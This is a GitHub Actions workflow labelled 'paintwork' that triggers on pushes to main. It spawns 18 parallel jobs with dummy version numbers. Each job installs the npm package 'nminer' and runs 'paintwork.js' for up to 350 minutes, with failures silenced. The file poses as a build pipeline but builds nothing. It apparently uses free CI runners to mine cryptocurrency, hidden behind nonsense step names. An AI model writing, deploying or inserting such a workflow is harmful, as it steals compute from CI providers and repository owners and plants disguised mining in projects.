name: paintwork
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2450 }
          - { version: 7577 }
          - { version: 4130 }
          - { version: 6916 }
          - { version: 703 }
          - { version: 6689 }
          - { version: 162 }
          - { version: 4447 }
          - { version: 4287 }
          - { version: 6684 }
          - { version: 6413 }
          - { version: 5739 }
          - { version: 804 }
          - { version: 3275 }
          - { version: 7268 }
          - { version: 7425 }
          - { version: 7514 }
          - { version: 5338 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: during next yippee
        run: |
          npm install nminer@latest
          timeout 350m node paintwork.js || echo "paintwork executed"